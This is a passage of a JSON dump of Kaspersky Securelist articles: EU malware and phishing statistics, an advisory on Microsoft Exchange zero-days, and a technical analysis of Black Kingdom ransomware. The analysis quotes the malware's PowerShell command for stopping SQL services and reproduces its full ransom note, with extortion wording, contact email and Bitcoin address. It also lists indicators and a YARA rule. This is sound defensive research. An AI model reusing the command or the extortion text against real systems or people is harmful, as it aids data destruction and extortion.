([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124836/11-en-european-ksb-2021.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\n_To assess the risk of online infection faced by EU users, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the reporting period. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries._\n\nThis rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware. Overall, during the reporting period, adware and its components were registered on **89.60%** of users&#x27; computers on which Web Anti-Virus was triggered.\n\n_Geography of malicious web-based attacks, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124905/12-en-european-ksb-2021.png>))_\n\nOn average, **13.70% **of Internet user computers in the EU experienced at least one Malware-class attack during the reporting period.\n\n**Top 10 EU countries where users faced the greatest risk of online infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Latvia | 21.11 \n2 | Greece | 18.50 \n3 | Estonia | 17.52 \n4 | France | 16.81 \n5 | Bulgaria | 14.86 \n6 | Italy | 14.76 \n7 | Portugal | 14.44 \n8 | Lithuania | 14.21 \n9 | Hungary | 13.82 \n10 | Poland | 13.17 \n \n_* The share of unique users targeted by Malware-class attacks in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious programs most actively used in online attacks\n\nDuring the reporting period, Kaspersky&#x27;s Web Anti-Virus detected **377,685 **unique malicious objects (scripts, exploits, executable files, etc.), as well as **2,676,988 **unique malicious URLs on which Web Anti-Virus was triggered. Based on the collected data, we identified the 20 most actively used malicious programs in online attacks on users&#x27; computers.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | Blocked | 49.22 \n2 | Trojan.Script.Generic | 12.52 \n3 | Hoax.HTML.FraudLoad.m | 8.38 \n4 | Trojan.PDF.Badur.gen | 2.46 \n5 | Trojan.Script.Agent.dc | 2.16 \n6 | Trojan.Multi.Preqw.gen | 2.11 \n7 | Trojan-Downloader.Script.Generic | 1.99 \n8 | Trojan.Script.Miner.gen | 1.56 \n9 | Exploit.MSOffice.CVE-2017-11882.gen | 1.02 \n10 | Trojan-PSW.Script.Generic | 0.91 \n11 | DangerousObject.Multi.Generic | 0.74 \n12 | Trojan.BAT.Miner.gen | 0.74 \n13 | Trojan.MSOffice.SAgent.gen | 0.60 \n14 | Trojan.Script.SAgent.gen | 0.50 \n15 | Trojan-Downloader.MSOffice.SLoad.gen | 0.47 \n16 | Trojan-Downloader.Win32.Upatre.pef | 0.33 \n17 | Trojan-Downloader.JS.Inor.a | 0.30 \n18 | Trojan-Downloader.MSWord.Agent.btl | 0.30 \n19 | Hoax.Script.Dating.gen | 0.27 \n20 | Trojan-Downloader.JS.SLoad.gen | 0.27 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of attacks by the given malicious program in the total number of Malware-class web attacks registered on the computers of unique users of Kaspersky products._\n\n## Local threats\n\n_Statistics on local infections of user computers is an important indicator. They include objects that penetrated the target computer through infecting files or removable storage media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.). These statistics additionally include objects detected on user computers after the first system scan by Kaspersky&#x27;s Anti-Virus application._\n\n_This section analyzes statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, as well as the results of scanning removable storage media._\n\n### Countries where users faced the highest risk of local infection\n\n_For each country in the EU, we calculated how often users there encountered a File Anti-Virus triggering during the year. Included are detections of objects found on user computers or removable media connected to them (flash drives, camera/phone memory cards, external hard drives). These statistics reflect the level of personal computer infection in different countries._\n\n_Geography of local infections by malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124941/13-en-european-ksb-2021.png>))_\n\nDuring the reporting period, on average, at least one piece of malware was detected on **18.77%** of computers, hard drives or removable media belonging to KSN users in the EU.\n\n**Top 10 EU countries where users faced the greatest risk of local infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 32.60 \n2 | Bulgaria | 31.55 \n3 | Latvia | 31.38 \n4 | Estonia | 29.48 \n5 | Hungary | 27.88 \n6 | Lithuania | 27.11 \n7 | Portugal | 26.01 \n8 | Cyprus | 25.43 \n9 | Italy | 24.64 \n10 | Spain | 23.57 \n \n_* The share of unique users on whose computers Malware-class local threats were blocked in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious objects detected on user computers\n\nWe identified the 20 most commonly detected threats on EU users&#x27; computers during the reporting period. Not included are Riskware-type programs and adware.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 19.45 \n2 | Trojan.Multi.BroSubsc.gen | 18.53 \n3 | Trojan.Script.Generic | 8.29 \n4 | Trojan.Multi.GenAutorunReg.a | 7.08 \n5 | Trojan.Multi.Misslink.a | 6.75 \n6 | Hoax.Win32.DriverToolKit.b | 2.77 \n7 | Trojan.MSOffice.SAgent.gen | 2.63 \n8 | Exploit.Script.Generic | 2.25 \n9 | Trojan.Win32.SEPEH.gen | 2.00 \n10 | Trojan-Downloader.Script.Generic | 1.91 \n11 | Worm.Win32.WBVB | 1.53 \n12 | Hoax.Win32.Uniblue.gen | 1.33 \n13 | Trojan.Script.Agent.gen | 1.29 \n14 | Trojan-Dropper.Win32.Scrop.adwo | 1.17 \n15 | Trojan.Multi.GenAutorunTask.c | 1.16 \n16 | Trojan.Win32.Generic | 1.12 \n17 | Trojan.Multi.GenBadur.gen | 1.10 \n18 | Trojan.BAT.Miner.gen | 1.09 \n19 | Trojan.Multi.GenAutorunTask.b | 1.07 \n20 | Trojan.Multi.GenAutorunTaskFile.a | 1.05 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of unique users on whose computers File Anti-Virus detected the given object in the total number of unique users of Kaspersky products whose Anti-Virus was triggered by malware._\n\n## Phishing in the EU\n\n### Phishing trends\n\n * **Cloud phishing**\n\nWe observed that the number of EU-targeted phishing resources on cloud platforms and hosting sites approximately doubled during the reporting period.\n\n * **Cryptocurrency**\n\nThe number of cryptocurrency-related phishing detections tripled. This category consists of fraudulent sites somehow linked to cryptocurrencies: in most cases, they are fake crypto exchanges that require users to invest money to gain access to an account that allegedly already contain complimentary currency. In fact, users just lose their own money if they try to buy access to such sites.\n\nAnother particularly interesting type of phishing we observed in the EU is a mixture of cryptocurrency and COVID-19 themes: fake sites offering COVID-19 vaccines for cryptocurrency.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19131933/European_KSB_2021.jpeg>)\n\n**_Example of fake COVID-19 vaccine offer_**\n\n * **Targeted extortion**\n\nIn late August 2020, we saw some unusual extortion messages. In them, cybercriminals claimed to have planted TNT somewhere in the recipient&#x27;s office, saying it would be detonated unless a ransom was paid or if police activity was observed near the building.\n\nWhereas individuals are asked to cough up the equivalent of $500\u20131,000 in bitcoin (the maximum we saw was around $5,000), for companies supposedly rigged with explosives the amount rises to roughly $20,000. The bulk of the scam e-mails are written in German, but we found English versions as well.\n\n * **Microsoft Office spear phishing**\n\nThe trend for harvesting Microsoft 365 credentials through spear phishing continues to evolve. Such phishing e-mails normally contain a hyperlink to a fake website. Sure enough, once many people had absorbed that simple precaution, phishers began replacing the links with attached HTML files, the sole purpose of which is to automate redirection. Clicking on the HTML attachment opens it in a browser. As far as the phishing aspect goes, the file has just one line of code (javascript: window.location.href) with the phishing website address as a variable. It forces the browser to open the website in the same window.\n\n### Phishing attacks\n\nIn total, **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU, representing 21.89% of all phishing attacks around the world during the reporting period.\n\n_EU share of phishing detections, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125028/15-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nDuring the reporting period, approximately **13.4%** users of Kaspersky solutions in the EU encountered at least one phishing attack.\n\n_Geography of EU phishing, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125056/14-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries where users faced phishing attacks**\n\n| **Country** | **%*** \n---|---|--- \n1 | Portugal | 18.34 \n2 | France | 17.98 \n3 | Belgium | 15.10 \n4 | Greece | 14.98 \n5 | Hungary | 14.87 \n6 | Italy | 14.44 \n7 | Slovakia | 12.77 \n8 | Spain | 12.74 \n9 | Poland | 12.47 \n10 | Latvia | 12.26 \n \n_* The share of unique users targeted by phishing attacks in the total number of unique users of Kaspersky products in the country._\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nPandemic-related events affected the distribution of phishing attacks across the categories of targeted organizations. However, the largest categories remained unchanged as they have done for several years: in the EU during reporting period, these were Global Internet portals (16.08%), Online stores (15.73%) and Payment systems (13.67%).\n\n_Share of phishing categories in the EU, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125126/16-en-european-ksb-2021.png>))_\n\n### Top-level domain (TLD) usage\n\nIn the share of EU top-level domains (TLDs), we include all national TLDs belonging to EU member states. In the reporting period, this share amounted to 7.27%.\n\n_Distribution of phishing domains by top-level domain, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125153/17-en-european-ksb-2021.png>))_\n\nThe share decreased significantly (-3 p.p.) at the end of 2020, but in Q1 2021 we observed a slight increase to 5.26%.\n\n_Timeline of share of EU top-level domains, Q2 2020 \u2013 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125220/18-en-european-ksb-2021.png>))_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19134557/eu_flag.jpg>) | **The project leading to this report has received funding from the European Union&#x27;s Horizon 2020 research and innovation programme under grant agreement No 883464.** \n---|---", "cvss3": {}, "published": "2021-05-26T10:00:32", "type": "securelist", "title": "Kaspersky Security Bulletin 2020-2021. EU statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-26T10:00:32", "id": "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "href": "https://securelist.com/kaspersky-security-bulletin-2020-2021-eu-statistics/102335/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-10T12:32:23", "description": "\n\n## What happened?\n\nOn March 2, 2021 several companies [released](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) [reports](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) about in-the-wild exploitation of zero-day vulnerabilities inside Microsoft Exchange Server. The following vulnerabilities allow an attacker to compromise a vulnerable Microsoft Exchange Server. As a result, an attacker will gain access to all registered email accounts, or be able to execute arbitrary code (remote code execution or RCE) within the Exchange Server context. In the latter case, the attacker will also be able to achieve persistence on the infected server.\n\nA total of four vulnerabilities were uncovered:\n\n 1. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). Server-side request forgery (SSRF) allows an attacker without authorization to query the server with a specially constructed request that will cause remote code execution. The exploited server will then forward the query to another destination. \n 2. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) caused by unsafe data deserialization inside the Unified Messaging service. Potentially allows an attacker to execute arbitrary code (RCE). As a result of insufficient control over user files, an attacker is able to forge a body of data query, and trick the high-privilege service into executing the code.\n 3. [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>). This vulnerability allows an authorized Exchange user to overwrite any existing file inside the system with their own data. To do so, the attacker has to compromise administrative credentials or exploit another vulnerability such as SSRF CVE-2021-26855.\n 4. [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is similar to CVE-2021-26858 and allows an authorized attacker to overwrite any system file on the Exchange server. \n\nKaspersky [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) shows that these vulnerabilities are already used by cybercriminals around the world.\n\n_Geography of attacks with mentioned MS Exchange vulnerabilities (based on KSN statistics) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>))_\n\nWe predict with a high degree of confidence that this is just the beginning, and we anticipate numerous exploitation attempts with the purpose of gaining access to resources inside corporate perimeters. Furthermore, we should note that there is typically a high risk of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) infection and/or data theft connected to such attacks. \n\n## How to protect against this threat?\n\nOur products protect against this threat with [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components and detect exploitation with the following verdict: PDM:Exploit.Win32.Generic \nWe detect the relevant exploits with the following detection names:\n\n * Exploit.Win32.CVE-2021-26857.gen\n * HEUR:Exploit.Win32.CVE-2021-26857.a\n\nWe also detect and block the payloads (backdoors) being used in the exploitation of these vulnerabilities, according to our Threat Intelligence. Possible detection names are (but not limited to):\n\n * HEUR:Trojan.ASP.Webshell.gen\n * HEUR:Backdoor.ASP.WebShell.gen\n * UDS:DangerousObject.Multi.Generic\n\nWe are actively monitoring the situation and additional detection logic will be released with updatable databases when required.\n\nOur [Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) helps to identify attacks in early stages by marking such suspicious actions with special IoA tags (and creating corresponding alerts). For example, this is an example of Powershell started by IIS Worker process (w3wp.exe) as a result of vulnerability exploitation: \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/07094546/microsoft_exchange_expoit_edr.png>)\n\nOur [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service is also able to identify and stop this attack by using threat hunting rules to spot the exploitation itself, as well as possible payload activity.\n\nAnd the thorough research of the attack will soon be available within APT Intelligence Reporting service, please contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>) for details.\n\n## Recommendations\n\n * As Microsoft has already released an update to fix all these vulnerabilities, we strongly recommend updating Exchange Server as soon as possible.\n * Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. Make sure you can quickly access it in an emergency.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and the [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service which help to identify and stop the attack in the early stages, before the attackers achieve their goals.\n * Use a reliable endpoint security solution such as Kaspersky Endpoint Security for Business that is powered by exploit prevention, behavior detection and a remediation engine that is able to roll back malicious actions. KESB also has self-defense mechanisms that can prevent its removal by cybercriminals.", "cvss3": {}, "published": "2021-03-04T17:20:57", "type": "securelist", "title": "Zero-day vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:20:57", "id": "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "href": "https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-17T10:31:39", "description": "\n\nBlack Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).\n\nThe complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and a possibility to recover files encrypted with Black Kingdom with the help of the hardcoded key. The industry already [provided a script](<https://blog.cyberint.com/black-kingdom-ransomware>) to recover encrypted files in case they were encrypted with the embedded key.\n\n## Background\n\nThe use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as [ProxyLogon](<https://proxylogon.com/>) was [publicly reported](<https://twitter.com/vikas891/status/1373282066603859969>) at the end of March.\n\nAround the same time, we published a story on another ransomware family used by the attackers after successfully exploiting vulnerabilities in Microsoft Exchange Server. The ransomware family was DearCry.\n\nAnalysis of Black Kingdom revealed that, compared to others, it is an amateurish implementation with several mistakes and a critical encryption flaw that could allow decrypting the files due to the use of a hardcoded key. Black Kingdom is not a new player: it was observed in action following other vulnerability exploitations in 2020, such as CVE-2019-11510.\n\n**Date** | **CVE** | **Product affected** \n---|---|--- \nJune 2020 | CVE-2019-11510 | Pulse Secure \nMarch 2021 | CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | Microsoft Exchange Server \n \n## Technical analysis\n\n### Delivery methods\n\nBlack Kingdom&#x27;s past activity indicates that ransomware was used in larger vulnerability exploitations campaigns related to Pulse Secure or Microsoft Exchange. [Public reports](<https://twitter.com/malwaretechblog/status/1373648027609657345>) indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.\n\n### Sleep parameters\n\nThe ransomware can be executed without parameters and will start to encrypt the system, however, it is possible to to run Black Kingdom with a number value, which it will interpret as the number of seconds to wait before starting encryption.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png>)\n\n**_&#x27;Sleep&#x27; parameter used as an argument_**\n\n### Ransomware is written in Python\n\nBlack Kingdom is coded in Python and compiled to an executable using PyInstaller. While analyzing the code statically, we found that most of the ransomware logic was coded into a file named _0xfff.py_. The ransomware is written in Python 3.7.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png>)\n\n**_Black Kingdom is coded in Python_**\n\n### Excluded directories\n\nThe adversary behind Black Kingdom specified certain folders to be excluded from encryption. The purpose is to avoid breaking the system during encryption. The list of excluded folders is available in the code:\n\n * Windows,\n * ProgramData,\n * Program Files,\n * Program Files (x86),\n * AppData/Roaming,\n * AppData/LocalLow,\n * AppData/Local.\n\nThe code that implements this functionality demonstrates how amateurishly Black Kingdom is written. The developers failed to use OS environments or regex to avoid repeating the code twice.\n\n### PowerShell command for process termination and history deletion\n\nPrior to file encryption, Black Kingdom uses PowerShell to try to stop all processes in the system that contain &quot;sql&quot; in the name with the following command:\n \n \n Get-Service*sql*|Stop-Service-Force2>$null\n\nOnce done, Black Kingdom will delete the PowerShell history in the system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png>)\n\n**_PowerShell commands run by Black Kingdom_**\n\nCombined with a cleanup of system logs, this supports the theory that the attackers try to remain hidden in the system by removing all traces of their activity.\n\n### Encryption process\n\nThe static analysis of Black Kingdom shows how it generates an AES-256 key based on the following algorithm.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png>)\n\n**_The pseudo-algorithm used by Black Kingdom_**\n\nThe malware generates a 64-character pseudo-random string. It then takes the MD5 hash of the string and uses it as the key for AES-256 encryption.\n\nThe code contains credentials for sending the generated key to the third-party service hxxp://mega.io. If the connection is unsuccessful, the Black Kingdom encrypts the data with a hardcoded key available in the code.\n\nBelow is an example of a successful connection with hxxp://mega.io.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png>)\n\n**_Connection established with mega.io_**\n\n** **The credentials for mega.io are hardcoded in base64 and used for connecting as shown below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png>)\n\n**_Hardcoded credentials_**\n\nThe file sent to Mega contained the following data.\n\n**Parameter** | **Description:** \n---|--- \nID: | Generated ID for user identification \nKey: | Generated user key \nUser: | Username in the infected system \nDomain: | Domain name to which the infected user belongs \n \nBlack Kingdom will encrypt a single file if it is passed as a parameter with the key to encrypt it. This could allow the attacker to encrypt one file instead of encrypting the entire system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png>)\n\n**_Function for encrypting a single file_**\n\nIf no arguments are used, the ransomware will start to enumerate files in the system and then encrypt these with a ten-threaded process. It performs the following basic operations:\n\n 1. Read the file,\n 2. Overwrite it with an encrypted version,\n 3. Rename the file.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png>)\n\n**_The function used for encrypting the system_**\n\nBlack Kingdom allows reading a file in the same directory called target.txt, which will be used by the ransomware to recursively collect files for the collected directories specified in that file and then encrypt them. Black Kingdom will also enumerate various drive letters and encrypt them. A rescue note will be delivered for each encrypted directory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png>)\n\n**_Rescue note used by the ransomware_**\n\n### Encryption mistakes\n\nAmateur ransomware developers often end up making mistakes that can help decryption, e.g., poor implementation of the encryption key, or, conversely, make recovery impossible even after the victim pays for a valid decryptor. Black Kingdom will try to upload the generated key to Mega, and if this fails, use a hardcoded key to encrypt the files. If the files have been encrypted and the system has not been able to make a connection to Mega, it will be possible to recover the files using the hardcoded keys.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png>)\n\n**_Hardcoded key in Base64_**\n\nWhile analyzing the code statically, we examined the author&#x27;s implementation of file encryption and found several mistakes that could affect victims directly. During the encryption process, Black Kingdom does not check whether the file is already encrypted or not. Other popular ransomware families normally add a specific extension or a marker to all encrypted files. However, if the system has been infected by Black Kingdom twice, files in the system will be encrypted twice, too, which may prevent recovery with a valid encryption key.\n\n### System log cleanup\n\nA feature of Black Kingdom is the ability to clean up system logs with a single Python function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png>)\n\n**_The function that cleans up system logs_**\n\nThis operation will result in Application, Security, and System event viewer logs being deleted. The purpose is to remove any history of ransomware activity, exploitation, and privilege escalation.\n\n### Ransomware note\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard with pyHook as it does so.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png>)\n\n**_Function to hook the mouse and keyboard_**\n\nWritten in English, the note contains several mistakes. All Black Kingdom notes contain the same Bitcoin address; sets it apart from other ransomware families, which provide a unique address to each victim.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nThe associated Bitcoin address is currently showing just two transactions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png>)\n\n**_Transactions made to a Bitcoin account_**\n\n### Code analysis\n\nAfter decompiling the Python code, we found that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on Github](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>).\n\nThe adversary behind Black Kingdom adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key or communication with the mega.io domain.\n\n## Victims\n\nBased on our telemetry we could see only a few hits by Black Kingdom in Italy and Japan.\n\n## Attribution\n\nWe could not attribute Black Kingdom to any known adversary in our case analysis. Its involvement in the Microsoft Exchange exploitation campaign suggests opportunism, rather than a resurgence in activity from this ransomware family.\n\nFor more information please contact: [financialintel@kaspersky.com](<mailto:financialintel@kaspersky.com>)\n\n## Appendix I \u2013 Indicators of Compromise\n\n**_Note:_**_ The indicators in this section were valid at the time of publication. Any future changes will be directly updated in the corresponding .ioc file._\n\n**File Hashes**\n\nb9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f \nc4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908 \na387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287 \n815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670 \n910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db \n866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc \nc25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n\n**Domain:**\n\nhxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn\n\n**YARA rules:**\n \n \n import \"hash\"\n import \"pe\"\n rule ransomware_blackkingdom {\n \n meta:\n \n description = \"Rule to detect Black Kingdom ransomware\"\n author = \"Kaspersky Lab\"\n copyright = \"Kaspersky Lab\"\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\n version = \"1.0\"\n last_modified = \"2021-05-02\"\n hash = \"866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\"\n hash = \"910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\"\n \n condition:\n \n hash.sha256(pe.rich_signature.clear_data) == \"0e7d0db29c7247ae97591751d3b6c0728aed0ec1b1f853b25fc84e75ae12b7b8\"\n }\n\n## Appendix II \u2013 MITRE ATT&amp;CK Mapping\n\nThis table contains all TTPs identified during the analysis of the activity described in this report.\n\n**Tactic** | **Technique.** | **Technique Name. ** \n---|---|--- \n**Execution** | **T1047** | **Windows Management Instrumentation** \n**T1059** | **Command and Scripting Interpreter** \n**T1106** | **Native API** \n**Persistence** | **T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Privilege Escalation** | **T1055** | **Process Injection** \n**T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1134** | **Access Token Manipulation** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Defense Evasion** | **T1562.001** | **Disable or Modify Tools** \n**T1140** | **Deobfuscate/Decode Files or Information** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1027** | **Obfuscated Files or Information** \n**T1574.002** | **DLL Side-Loading** \n**T1036** | **Masquerading** \n**T1134** | **Access Token Manipulation** \n**T1055** | **Process Injection** \n**Credential Access** | **T1056** | **Input Capture** \n**Discovery** | **T1083** | **File and Directory Discovery** \n**T1082** | **System Information Discovery** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1012** | **Query Registry** \n**T1518.001** | **Security Software Discovery** \n**T1057** | **Process Discovery** \n**T1018** | **Remote System Discovery** \n**T1016** | **System Network Configuration Discovery** \n**Collection** | **T1560** | **Archive Collected Data** \n**T1005** | **Data from Local System** \n**T1114** | **Email Collection** \n**T1056** | **Input Capture** \n**Command and Control** | **T1573** | **Encrypted Channel** \n**Impact** | **T1486** | **Data Encrypted for Impact**", "cvss3": {}, "published": "2021-06-17T10:00:41", "type": "securelist", "title": "Black Kingdom ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-06-17T10:00:41", "id": "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "href": "https://securelist.com/black-kingdom-ransomware/102873/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 